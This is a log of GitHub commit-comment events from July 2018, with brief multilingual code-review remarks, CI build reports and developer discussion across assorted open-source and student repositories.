{"id":"7954090313","type":"CommitCommentEvent","actor":{"login":"CES-Mandala"},"repo":{"name":"CES-Mandala/Mandala-Design"},"payload":{"comment":{"id":29680468,"position":null,"line":null,"path":null,"commit_id":"2e5f51ee8a7cd0ac33c23373c37a8f65817dc908","created_at":"2018-07-12T05:55:22Z","updated_at":"2018-07-12T05:55:22Z","author_association":"OWNER","body":"New files to be uploaded"}},"created_at":"2018-07-12T05:55:22Z"}
{"id":"7954090415","type":"CommitCommentEvent","actor":{"login":"JungYuJin"},"repo":{"name":"ixymori/algorithm"},"payload":{"comment":{"id":29680469,"position":null,"line":null,"path":null,"commit_id":"b1c1709d313f9f2ca0a7b072bb5a77ca6c3b9908","created_at":"2018-07-12T05:55:23Z","updated_at":"2018-07-12T05:55:23Z","author_association":"NONE","body":"그뤠잇!"}},"created_at":"2018-07-12T05:55:23Z"}
{"id":"7954090720","type":"CommitCommentEvent","actor":{"login":"harimadhavk"},"repo":{"name":"Microsoft/PowerBI-visuals-sampleBarChart"},"payload":{"comment":{"id":29680471,"position":null,"line":null,"path":null,"commit_id":"3018a4ef020ee5de8a87be5f29f008bd5cf8fe63","created_at":"2018-07-12T05:55:29Z","updated_at":"2018-07-12T05:55:29Z","author_association":"NONE","body":"import ISelectionId from powerbi.visuals.ISelectionId. This provides the selector method."}},"created_at":"2018-07-12T05:55:29Z"}
{"id":"7954090837","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680472,"position":20,"line":18,"path":"src/Customer/Customer.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T05:55:32Z","updated_at":"2018-07-12T05:55:32Z","author_association":"NONE","body":"Описание не нужно здесь"}},"created_at":"2018-07-12T05:55:32Z"}
{"id":"7954091419","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"zlatinb/muwire"},"payload":{"comment":{"id":29680473,"position":34,"line":33,"path":"host-cache/src/main/groovy/com/muwire/hostcache/HostCache.groovy","commit_id":"a0d6eb6dd9e84b237dcc3c5f60d499327e16f79f","created_at":"2018-07-12T05:55:44Z","updated_at":"2018-07-12T05:55:44Z","author_association":"NONE","body":"`;` reflexes"}},"created_at":"2018-07-12T05:55:44Z"}
{"id":"7954092174","type":"CommitCommentEvent","actor":{"login":"JungYuJin"},"repo":{"name":"ixymori/jsp"},"payload":{"comment":{"id":29680474,"position":null,"line":null,"path":null,"commit_id":"1a06f1a87dbfbe24ae660cbdadc8dcb9d8044602","created_at":"2018-07-12T05:55:58Z","updated_at":"2018-07-12T05:55:58Z","author_association":"NONE","body":"그뤠잇!"}},"created_at":"2018-07-12T05:55:58Z"}
{"id":"7954092697","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680478,"position":60,"line":39,"path":"src/Customer/Customer.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T05:56:10Z","updated_at":"2018-07-12T05:56:10Z","author_association":"NONE","body":"`$formatter` а не `$format`"}},"created_at":"2018-07-12T05:56:10Z"}
{"id":"7954093969","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680481,"position":67,"line":43,"path":"src/Customer/Customer.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T05:56:35Z","updated_at":"2018-07-12T05:56:35Z","author_association":"NONE","body":"Почему `$result`? Эта переменная ничего не описывает"}},"created_at":"2018-07-12T05:56:35Z"}
{"id":"7954094657","type":"CommitCommentEvent","actor":{"login":"bpasero"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29680482,"position":9,"line":18,"path":"src/vs/workbench/electron-browser/media/shell.css","commit_id":"0bef29d2eadd04b48d9518b5a96259ec54b64434","created_at":"2018-07-12T05:56:49Z","updated_at":"2018-07-12T05:56:49Z","author_association":"MEMBER","body":"🙉 "}},"created_at":"2018-07-12T05:56:49Z"}
{"id":"7954096269","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680488,"position":72,"line":45,"path":"src/Customer/Customer.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T05:57:26Z","updated_at":"2018-07-12T05:57:26Z","author_association":"NONE","body":"$format->format ..."}},"created_at":"2018-07-12T05:57:26Z"}
{"id":"7954096669","type":"CommitCommentEvent","actor":{"login":"HerryYT"},"repo":{"name":"KCodeYT/ProxProx"},"payload":{"comment":{"id":29680491,"position":null,"line":null,"path":null,"commit_id":"f09e97731c26e985ad9ea69f310d026516bd32b9","created_at":"2018-07-12T05:57:36Z","updated_at":"2018-07-12T05:57:36Z","author_association":"NONE","body":"AHAHAH WTF"}},"created_at":"2018-07-12T05:57:36Z"}
{"id":"7954097069","type":"CommitCommentEvent","actor":{"login":"JungYuJin"},"repo":{"name":"kwontaewan/AndroidMVP_opener"},"payload":{"comment":{"id":29680492,"position":null,"line":null,"path":null,"commit_id":"fee60d6f94141f8238cb66d0d16aa6b44042270e","created_at":"2018-07-12T05:57:44Z","updated_at":"2018-07-12T05:57:44Z","author_association":"NONE","body":"그뤠잇!"}},"created_at":"2018-07-12T05:57:44Z"}
{"id":"7954099346","type":"CommitCommentEvent","actor":{"login":"zlatinb"},"repo":{"name":"zlatinb/muwire"},"payload":{"comment":{"id":29680495,"position":34,"line":33,"path":"host-cache/src/main/groovy/com/muwire/hostcache/HostCache.groovy","commit_id":"a0d6eb6dd9e84b237dcc3c5f60d499327e16f79f","created_at":"2018-07-12T05:58:35Z","updated_at":"2018-07-12T05:58:35Z","author_association":"OWNER","body":"lol"}},"created_at":"2018-07-12T05:58:35Z"}
{"id":"7954099930","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680497,"position":21,"line":22,"path":"src/Customer/FormatterFactory.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T05:58:47Z","updated_at":"2018-07-12T05:58:47Z","author_association":"NONE","body":"`Htmlable` - интерфейс. Насколько знаю, нельзя создавать экземпляры интерфейсов"}},"created_at":"2018-07-12T05:58:47Z"}
{"id":"7954100652","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680500,"position":26,"line":26,"path":"src/Customer/FormatterFactory.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T05:59:03Z","updated_at":"2018-07-12T05:59:03Z","author_association":"NONE","body":"Аналогично"}},"created_at":"2018-07-12T05:59:03Z"}
{"id":"7954102087","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680501,"position":7,"line":7,"path":"src/Customer/FormatterInterface.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T05:59:35Z","updated_at":"2018-07-12T05:59:35Z","author_association":"NONE","body":"Почему я не могу передать один массив с параметрами? В чем разница?"}},"created_at":"2018-07-12T05:59:35Z"}
{"id":"7954104589","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680515,"position":6,"line":6,"path":"src/Customer/Htmlable.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T06:00:23Z","updated_at":"2018-07-12T06:00:23Z","author_association":"NONE","body":"Следуя PHP naming convention, `Htmlable` - интерфейс"}},"created_at":"2018-07-12T06:00:23Z"}
{"id":"7954106939","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"zlatinb/muwire"},"payload":{"comment":{"id":29680528,"position":31,"line":59,"path":"host-cache/src/main/groovy/com/muwire/hostcache/HostCache.groovy","commit_id":"beb848ee65661bdf51436dfcd6864fff93f45a95","created_at":"2018-07-12T06:01:07Z","updated_at":"2018-07-12T06:01:07Z","author_association":"NONE","body":"typo"}},"created_at":"2018-07-12T06:01:07Z"}
{"id":"7954107761","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680530,"position":6,"line":6,"path":"src/Customer/PriceCodes/ChildrenPriceCode.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T06:01:22Z","updated_at":"2018-07-12T06:01:22Z","author_association":"NONE","body":"Здесь как раз целесообразен интерфейс. Т.к. несколько подобныйх классов с одним методом"}},"created_at":"2018-07-12T06:01:22Z"}
{"id":"7954108118","type":"CommitCommentEvent","actor":{"login":"ZombineDev"},"repo":{"name":"dlang/druntime"},"payload":{"comment":{"id":29680531,"position":7,"line":7,"path":"test/exceptions/src/rt_trap_exceptions_drt.d","commit_id":"7689cc56d169140dec92b2c59d5d2a318642f62c","created_at":"2018-07-12T06:01:30Z","updated_at":"2018-07-12T06:01:30Z","author_association":"MEMBER","body":"You can assert here that trapException is 0."}},"created_at":"2018-07-12T06:01:30Z"}
{"id":"7954110004","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680532,"position":16,"line":16,"path":"src/Customer/PriceCodes/PriceCodesFactory.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T06:02:09Z","updated_at":"2018-07-12T06:02:09Z","author_association":"NONE","body":"`create(int $priceCode)`"}},"created_at":"2018-07-12T06:02:09Z"}
{"id":"7954116095","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680541,"position":10,"line":10,"path":"src/Customer/Statement/Statement.php","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T06:04:11Z","updated_at":"2018-07-12T06:04:11Z","author_association":"NONE","body":"object? Или может `Rantal[]`"}},"created_at":"2018-07-12T06:04:11Z"}
{"id":"7954116383","type":"CommitCommentEvent","actor":{"login":"CheaSim"},"repo":{"name":"szpinc/Hacintosh_MiBookAir13.3_i5-8250U_with_10.13.5"},"payload":{"comment":{"id":29680542,"position":null,"line":null,"path":null,"commit_id":"57f02ad04d9a609ccba68d078306967038b4ec8d","created_at":"2018-07-12T06:04:17Z","updated_at":"2018-07-12T06:04:17Z","author_association":"NONE","body":"大佬，我用了您的clover文件，触控板不支持，是只是替换clover文件嘛。"}},"created_at":"2018-07-12T06:04:17Z"}
{"id":"7954119723","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29680546,"position":null,"line":null,"path":null,"commit_id":"3c923326b6f316f40554f32e970b9b87d64b8b48","created_at":"2018-07-12T06:05:17Z","updated_at":"2018-07-12T06:05:17Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-update-s](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-update-s).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-update-s-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T06:05:17Z"}
{"id":"7954122862","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"zlatinb/muwire"},"payload":{"comment":{"id":29680553,"position":14,"line":22,"path":"doc/design.md","commit_id":"f283b6d32fab3cb55be5ce8cfaa7006508a9fff1","created_at":"2018-07-12T06:06:19Z","updated_at":"2018-07-12T06:06:19Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-12T06:06:19Z"}
{"id":"7954122994","type":"CommitCommentEvent","actor":{"login":"nafg"},"repo":{"name":"scala/scala-lang"},"payload":{"comment":{"id":29680554,"position":null,"line":null,"path":null,"commit_id":"646cbb68846038ed69e66e74e056ba394a694ab9","created_at":"2018-07-12T06:06:22Z","updated_at":"2018-07-12T06:06:22Z","author_association":"NONE","body":"Nice. I wonder if it should say \"avoid bugs *even* in complex applications\" -- Scala, and bug avoidance, are useful even in small scripts."}},"created_at":"2018-07-12T06:06:22Z"}
{"id":"7954124936","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29680556,"position":null,"line":null,"path":null,"commit_id":"2608a894f3791f0e4e9e63173b3ae670f0493e5b","created_at":"2018-07-12T06:07:03Z","updated_at":"2018-07-12T06:07:03Z","author_association":"NONE","body":"issue_#6601_1 (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (2933 of 2934 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T06:07:03Z"}
{"id":"7954126079","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"ablashimov/refactoring"},"payload":{"comment":{"id":29680558,"position":6,"line":38,"path":"task.php","commit_id":"eaf7305165c235aee4490f3e1070af09bb38d6e9","created_at":"2018-07-12T06:07:29Z","updated_at":"2018-07-12T06:07:29Z","author_association":"NONE","body":"Сейчас название переменной не лучше"}},"created_at":"2018-07-12T06:07:29Z"}
{"id":"7954132736","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"zlatinb/muwire"},"payload":{"comment":{"id":29680572,"position":14,"line":22,"path":"doc/design.md","commit_id":"f283b6d32fab3cb55be5ce8cfaa7006508a9fff1","created_at":"2018-07-12T06:09:43Z","updated_at":"2018-07-12T06:09:43Z","author_association":"NONE","body":"When the search result is sent (in \"Unconfirmed\" state), perhaps it should include the merkle root of the list of hashes, (perhaps it already includes an infohash), so that you can turn as many \"Unconfirmed\" results into \"confirmed\" if you've previously confirmed them before, or if you've exchanged lists of previously confirmed results with trusted peers."}},"created_at":"2018-07-12T06:09:43Z"}
{"id":"7954136463","type":"CommitCommentEvent","actor":{"login":"SweetyFeel"},"repo":{"name":"SweetyFeel/hap"},"payload":{"comment":{"id":29680574,"position":null,"line":null,"path":null,"commit_id":"bf0fea4f4b296d201c07b0f8d571bba0d03fe559","created_at":"2018-07-12T06:10:57Z","updated_at":"2018-07-12T06:10:57Z","author_association":"OWNER","body":"ok\r\n"}},"created_at":"2018-07-12T06:10:57Z"}
{"id":"7954138580","type":"CommitCommentEvent","actor":{"login":"asiagromasia"},"repo":{"name":"asiagromasia/cwiczenie"},"payload":{"comment":{"id":29680575,"position":null,"line":null,"path":null,"commit_id":"63927dedae87a540b934966cf27ae3822a002460","created_at":"2018-07-12T06:11:38Z","updated_at":"2018-07-12T06:11:38Z","author_association":"OWNER","body":"comment on commit"}},"created_at":"2018-07-12T06:11:38Z"}
{"id":"7954138792","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29680576,"position":null,"line":null,"path":null,"commit_id":"266f61b0f4b4fa2e829fa074abc469ee1ca0c7d2","created_at":"2018-07-12T06:11:42Z","updated_at":"2018-07-12T06:11:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-467](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-467).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-467-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T06:11:42Z"}
{"id":"7954139132","type":"CommitCommentEvent","actor":{"login":"eecsninja"},"repo":{"name":"eecsninja/techerspace"},"payload":{"comment":{"id":29680577,"position":3,"line":3,"path":".gitignore","commit_id":"2ce7784ca759dc59bd399d6594d0c48446f11a48","created_at":"2018-07-12T06:11:48Z","updated_at":"2018-07-12T06:11:48Z","author_association":"OWNER","body":"You added this too."}},"created_at":"2018-07-12T06:11:48Z"}
{"id":"7954142748","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"zlatinb/muwire"},"payload":{"comment":{"id":29680584,"position":4,"line":3,"path":"doc/wire-protocol.md","commit_id":"42a4d63a3c4db27fea561e9e321108c0e56e80b5","created_at":"2018-07-12T06:13:01Z","updated_at":"2018-07-12T06:13:01Z","author_association":"NONE","body":"is this like an encrypted Reliable UDP (RUDP)?"}},"created_at":"2018-07-12T06:13:01Z"}
{"id":"7954146496","type":"CommitCommentEvent","actor":{"login":"markafarrell"},"repo":{"name":"ansible/tower-cli"},"payload":{"comment":{"id":29680589,"position":null,"line":null,"path":null,"commit_id":"71de9de6676c750dcf4d2253cdf0cee01571c343","created_at":"2018-07-12T06:14:14Z","updated_at":"2018-07-12T06:14:14Z","author_association":"NONE","body":"You also need to pass outfile to the wait method in line [859](https://github.com/ansible/tower-cli/blob/71de9de6676c750dcf4d2253cdf0cee01571c343/tower_cli/models/base.py#L859) as it also generates output."}},"created_at":"2018-07-12T06:14:14Z"}
{"id":"7954146706","type":"CommitCommentEvent","actor":{"login":"MarquelH"},"repo":{"name":"MarquelH/Code2040HackSF"},"payload":{"comment":{"id":29680591,"position":null,"line":null,"path":null,"commit_id":"71bb4a566052005a6d8403328678629a6c11467c","created_at":"2018-07-12T06:14:18Z","updated_at":"2018-07-12T06:14:18Z","author_association":"OWNER","body":"This actually was just the adding of the storyboard files"}},"created_at":"2018-07-12T06:14:18Z"}
{"id":"7954148111","type":"CommitCommentEvent","actor":{"login":"MarquelH"},"repo":{"name":"MarquelH/Code2040HackSF"},"payload":{"comment":{"id":29680593,"position":null,"line":null,"path":null,"commit_id":"ccf8b1db1132383bfc775348d309308f234b3425","created_at":"2018-07-12T06:14:45Z","updated_at":"2018-07-12T06:14:45Z","author_association":"OWNER","body":"This is where the pods came in"}},"created_at":"2018-07-12T06:14:45Z"}
{"id":"7954149540","type":"CommitCommentEvent","actor":{"login":"zlatinb"},"repo":{"name":"zlatinb/muwire"},"payload":{"comment":{"id":29680596,"position":4,"line":3,"path":"doc/wire-protocol.md","commit_id":"42a4d63a3c4db27fea561e9e321108c0e56e80b5","created_at":"2018-07-12T06:15:12Z","updated_at":"2018-07-12T06:15:12Z","author_association":"OWNER","body":"Well everything in I2P is encrypted and yes it is as reliable as possible.  But I moved away from I2P datagrams for search results because with streaming connection the sender is automatically verified."}},"created_at":"2018-07-12T06:15:12Z"}
{"id":"7954149992","type":"CommitCommentEvent","actor":{"login":"anselm0"},"repo":{"name":"ponchoms/tx-income-byzipcode"},"payload":{"comment":{"id":29680600,"position":17,"line":44,"path":"med_income_tx_zip_map/logic.js","commit_id":"decf8522d7da516887900aad01b14e845e2dda8b","created_at":"2018-07-12T06:15:20Z","updated_at":"2018-07-12T06:15:20Z","author_association":"NONE","body":"Good job making this work, but you need to make sure you are using the HTML tags correctly.  \r\nThis is what you built out with your code\r\n<h3><strong>$ <em>zips[0].properties['Avg. Income/H/hold']</strong></h3><p><strong></em></h4>zips[0].properties['City'] , zips[0].properties['Zip Code'] \r\n\r\nYou have an unclosed <p> tag and a closing </h4> tag without an opening one and no closing tags after your last element.  I went ahead and corrected this on my repo.\r\n"}},"created_at":"2018-07-12T06:15:20Z"}
{"id":"7954153748","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29680606,"position":23,"line":25,"path":"src/main/java/com/agurova/controllers/ImageController.java","commit_id":"860a4d810230803f9e6f751e2f3c7d0bcd05178d","created_at":"2018-07-12T06:16:29Z","updated_at":"2018-07-12T06:16:29Z","author_association":"COLLABORATOR","body":"Непонятное название переменой. "}},"created_at":"2018-07-12T06:16:29Z"}
{"id":"7954153798","type":"CommitCommentEvent","actor":{"login":"auvipy"},"repo":{"name":"chibisov/drf-extensions"},"payload":{"comment":{"id":29680607,"position":null,"line":null,"path":null,"commit_id":"00712396be979aaa5a86246bee39284b5e5e8d71","created_at":"2018-07-12T06:16:30Z","updated_at":"2018-07-12T06:16:30Z","author_association":"COLLABORATOR","body":"you should install from master"}},"created_at":"2018-07-12T06:16:30Z"}
{"id":"7954153835","type":"CommitCommentEvent","actor":{"login":"mpbelhorn"},"repo":{"name":"django-helpdesk/django-helpdesk"},"payload":{"comment":{"id":29680608,"position":39,"line":410,"path":"helpdesk/views/staff.py","commit_id":"4d78bc85cabbe657b752c7700103ce98171613ca","created_at":"2018-07-12T06:16:30Z","updated_at":"2018-07-12T06:16:30Z","author_association":"NONE","body":"@gwasser :\r\n\r\nSomehow when `ticket.due_date == None`, `due_date = request.POST.get('due_date', None)` is `''` and this block exits here with `due_date != ticket.due_date`.  This causes me to get:\r\n\r\n```\r\ndjango.core.exceptions.ValidationError: [\"'' value has an invalid format. It must be in YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ] format.\"]\r\n```\r\nAll the functions in the [django.utils.dateparse](https://docs.djangoproject.com/en/2.0/_modules/django/utils/dateparse/) module implicitly return `None` instead of `''`.\r\n\r\nThat is, I think this block should be:\r\n\r\n```\r\n       if match:\r\n           kw = {k: int(v) for k, v in match.groupdict().items()}\r\n           due_date = date(**kw)\r\n       else:\r\n           due_date = None\r\n           # or maybe even due_date = due_date or ticket.due_date or None\r\n```\r\n\r\nAm I missing something here or are my settings off? Let me know if there is any more information I can provide on the error I'm getting. I'd like to not need to override this view in my own app if you know a good work-around.\r\n\r\nIf my thoughts here sounds correct, let me know: I'd be happy to open a proper issue and submit a PR.\r\n\r\nCheers, and thanks for all your effort developing this app."}},"created_at":"2018-07-12T06:16:30Z"}
{"id":"7954155676","type":"CommitCommentEvent","actor":{"login":"os72"},"repo":{"name":"os72/protoc-jar-maven-plugin"},"payload":{"comment":{"id":29680611,"position":null,"line":null,"path":null,"commit_id":"2c6b9838b239e1de1fdb8262c468d17e1021c513","created_at":"2018-07-12T06:17:05Z","updated_at":"2018-07-12T06:17:05Z","author_association":"OWNER","body":"For issue #31 "}},"created_at":"2018-07-12T06:17:05Z"}
{"id":"7954158839","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29680616,"position":17,"line":12,"path":"src/main/java/com/agurova/services/dal/impl/ImageRepositoryServiceImpl.java","commit_id":"860a4d810230803f9e6f751e2f3c7d0bcd05178d","created_at":"2018-07-12T06:18:03Z","updated_at":"2018-07-12T06:18:03Z","author_association":"COLLABORATOR","body":"Вынести внедрение зависимости в XML конфигурацию."}},"created_at":"2018-07-12T06:18:03Z"}
{"id":"7954161207","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29680623,"position":25,"line":20,"path":"src/main/java/com/agurova/services/helper/impl/ImageMainServiceImpl.java","commit_id":"860a4d810230803f9e6f751e2f3c7d0bcd05178d","created_at":"2018-07-12T06:18:49Z","updated_at":"2018-07-12T06:18:49Z","author_association":"COLLABORATOR","body":"Фантомные пустые строчки?"}},"created_at":"2018-07-12T06:18:49Z"}
{"id":"7954161351","type":"CommitCommentEvent","actor":{"login":"1Emiir"},"repo":{"name":"1Emiir/hello-world"},"payload":{"comment":{"id":29680625,"position":null,"line":null,"path":null,"commit_id":"66b6b00a1dacc5d77afd8101b7f35a57f6c00e23","created_at":"2018-07-12T06:18:52Z","updated_at":"2018-07-12T06:18:52Z","author_association":"OWNER","body":"tacos + coca-cola is the nuts"}},"created_at":"2018-07-12T06:18:52Z"}
{"id":"7954162100","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29680626,"position":33,"line":24,"path":"src/main/java/com/agurova/services/helper/impl/ImageMainServiceImpl.java","commit_id":"860a4d810230803f9e6f751e2f3c7d0bcd05178d","created_at":"2018-07-12T06:19:07Z","updated_at":"2018-07-12T06:19:07Z","author_association":"COLLABORATOR","body":"Вынести внедрение зависимостей в XML конфигурацию."}},"created_at":"2018-07-12T06:19:07Z"}
{"id":"7954162579","type":"CommitCommentEvent","actor":{"login":"yashhsm"},"repo":{"name":"yashhsm/PythonBlockchain"},"payload":{"comment":{"id":29680627,"position":1,"line":1,"path":"README.md","commit_id":"72266f49684a6ab20dc1dd5762b67fff67c9e27f","created_at":"2018-07-12T06:19:15Z","updated_at":"2018-07-12T06:19:15Z","author_association":"OWNER","body":"A sample python program on Blockchain\r\n"}},"created_at":"2018-07-12T06:19:15Z"}
{"id":"7954168157","type":"CommitCommentEvent","actor":{"login":"mpbelhorn"},"repo":{"name":"django-helpdesk/django-helpdesk"},"payload":{"comment":{"id":29680634,"position":39,"line":410,"path":"helpdesk/views/staff.py","commit_id":"4d78bc85cabbe657b752c7700103ce98171613ca","created_at":"2018-07-12T06:21:01Z","updated_at":"2018-07-12T06:21:01Z","author_association":"NONE","body":"It occurs to me that another solution might be, at line 402,\r\n\r\n```\r\ndue_date = request.POST.get('due_date', None) or None\r\n```\r\n\r\nwhich would allow `request.POST.get('due_date', None) == ''` to reach line 414."}},"created_at":"2018-07-12T06:21:01Z"}
{"id":"7954169747","type":"CommitCommentEvent","actor":{"login":"lizhuoyuan"},"repo":{"name":"lizhuoyuan/ReactNativeScreenUtil"},"payload":{"comment":{"id":29680639,"position":null,"line":null,"path":null,"commit_id":"b4037c862320e221af0e062eb404735635eb20aa","created_at":"2018-07-12T06:21:30Z","updated_at":"2018-07-12T06:21:30Z","author_association":"OWNER","body":"最新的屏幕适配方法在android上的效果非常好，iOS未测试，如果iOS上效果不好，请使用最初的版本"}},"created_at":"2018-07-12T06:21:30Z"}
{"id":"7954173735","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29680649,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-12T06:22:40Z","updated_at":"2018-07-12T06:22:40Z","author_association":"OWNER","body":"@noobpwnftw most likely the high residuals are caused by the timeouts in earlier batches. Don't think this can be fixed with the current setup. It is possible to stop the test and purge things, but I'm not sure how much will be removed. I think all batches by the same worker ID... not sure if all workers are purged at the same time, or just the one with the highest variance, and afterwards the variance is recomputed.\r\n\r\nI guess the test could just be stopped, since the patch failed on 3 threads. The value of letting it continue would rather be a test of the stability of the machine, i.e. do we see the timeouts come back or not. The last few batch had a few timeouts, but nothing spectacular yet."}},"created_at":"2018-07-12T06:22:40Z"}
{"id":"7954196650","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29680692,"position":null,"line":null,"path":null,"commit_id":"70091875b188b6c001632d257fd30ccad8f68833","created_at":"2018-07-12T06:29:39Z","updated_at":"2018-07-12T06:29:39Z","author_association":"NONE","body":"BugFix-EMSAlphaAllocation (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T06:29:39Z"}
{"id":"7954197080","type":"CommitCommentEvent","actor":{"login":"Darshan-Chauhan"},"repo":{"name":"crossroads/api.goodcity"},"payload":{"comment":{"id":29680693,"position":null,"line":null,"path":null,"commit_id":"41905f302b5bf368ecb367b324204f67c37c3ffb","created_at":"2018-07-12T06:29:46Z","updated_at":"2018-07-12T06:29:46Z","author_association":"CONTRIBUTOR","body":"Thanks for pointing this out @steveyken , I've changed the TwilioJob queue to high ."}},"created_at":"2018-07-12T06:29:46Z"}
{"id":"7954203738","type":"CommitCommentEvent","actor":{"login":"machineWoong"},"repo":{"name":"kmw723go/Wat_Show"},"payload":{"comment":{"id":29680707,"position":null,"line":null,"path":null,"commit_id":"30da7b56996584acb8cee304d19bea469ae433cc","created_at":"2018-07-12T06:31:41Z","updated_at":"2018-07-12T06:31:41Z","author_association":"COLLABORATOR","body":"ㅇㅇ"}},"created_at":"2018-07-12T06:31:41Z"}
